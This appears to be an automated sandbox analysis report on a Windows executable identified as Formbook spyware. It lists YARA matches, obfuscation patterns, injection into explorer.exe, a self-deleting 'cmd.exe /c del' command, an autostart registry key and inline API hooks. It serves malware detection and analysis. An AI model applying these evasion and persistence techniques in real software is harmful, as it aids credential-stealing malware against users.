00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C340 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00452DE0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0044D1BC Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046724C Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401026 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401030 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041DA67 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041D4F2 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4F7 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4FA Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D87 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D90 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00409E20 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041CEE3 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E764 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402FB0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B090 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1002 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FF900 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2EBB0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0841F Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0D5E0 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F0D20 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC1D55 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A16E30 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B090 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F20A8 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F28EC Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1002 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483841F Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048ED466 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F25DD Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483D5E0 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482F900 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2D07 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04820D20 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1D55 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F22AE Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2EF7 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04846E30 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485EBB0 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EDBD2 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1FF1 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2B28 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4F7 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4FA Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D87 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D90 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00229E20 Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222FB0
 Found potential string decryption / allocating functions Show sources
 Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 0482B150 appears 35 times Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 009FB150 appears 32 times Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 00406A94 appears 57 times
 PE file contains strange resources Show sources
 Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST Source: R6o4qCis6s.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info Show sources
 Source: R6o4qCis6s.exe, 00000000.00000002.213709670.0000000002250000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs R6o4qCis6s.exe Source: R6o4qCis6s.exe, 00000001.00000002.257369887.0000000002ABE000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs R6o4qCis6s.exe Source: R6o4qCis6s.exe, 00000001.00000002.256353514.0000000000AEF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs R6o4qCis6s.exe
 Yara signature match Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/2
 Contains functionality for error logging Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00421830 GetLastError,FormatMessageA,
 Contains functionality to check free disk space Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408E98 GetDiskFreeSpaceA,
 Contains functionality to load and extract PE file embedded resources Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004146E8 FindResourceA,
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
 Launches a second explorer.exe instance Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
 Parts of this applications are using Borland Delphi (Probably coded in Delphi) Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
 Reads the hosts file Show sources
 Sample is known by Antivirus Show sources
 Source: R6o4qCis6s.exe Virustotal: Detection: 77% Source: R6o4qCis6s.exe ReversingLabs: Detection: 79%
 Spawns processes Show sources
 Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe' Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe' Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe' Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe' Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
 Uses an in-process (OLE) Automation server Show sources
 Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
 Writes ini files Show sources
 Checks if Microsoft Office is installed Show sources
 Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
 Binary contains paths to debug symbols Show sources
 Source: Binary string: explorer.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp Source: Binary string: wntdll.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256223988.00000000009D0000.00000040.00000001.sdmp, explorer.exe, 00000005.00000002.483146175.000000000491F000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: R6o4qCis6s.exe, explorer.exe Source: Binary string: explorer.pdb source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp

### Data Obfuscation:

 Detected unpacking (changes PE section rights) Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Unpacked PE file: 1.2.R6o4qCis6s.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
 Contains functionality to dynamically determine API calls Show sources
 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00444B40 push 00444BCDh; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00482040 push 00482066h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00472060 push 0047208Ch; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00482008 push 00482034h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00474134 push 00474160h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047C274 push 0047C2A0h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046C22C push 0046C258h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047C2C0 push 0047C2ECh; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004722F4 push 00472320h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0042A2B4 push 0042A2E0h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C340 push 0040C78Ch; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004703C0 push 004703ECh; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0041E45C push 0041E502h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046A48C push 0046A4B8h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00472498 push 004724C4h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00428550 push 0042857Ch; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043A524 push ecx; mov dword ptr [esp], ecx Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046C5F4 push 0046C620h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004705F4 push 00470620h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047267C push 004726A8h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C610 push 0040C78Ch; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004066CA push 0040671Dh; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004066CC push 0040671Dh; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004286E8 push 00428714h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047A7F8 push 0047A824h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C78E push 0040C7FFh; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C790 push 0040C7FFh; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047A798 push 0047A7C4h; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0041E860 push 0041E88Ch; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C86E push 0040C89Ch; ret Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C870 push 0040C89Ch; ret

### Boot Survival:

 Creates an undocumented autostart registry key Show sources
 Source: C:\Windows\SysWOW64\explorer.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 9RFXABXP Jump to behavior

### Hooking and other Techniques for Hiding and Protection:

 Modifies the prolog of user mode functions (user mode inline hooks) Show sources
 Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE2
 Contains functionality to check if a window is minimized (may be used to check if an application is visible) Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0045880C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00428920 IsIconic,GetWindowPlacement,GetWindowRect, Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043ED90 IsIconic,GetCapture, Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043F638 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00455888 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
 Extensive use of GetProcAddress (often used to hide API calls) Show sources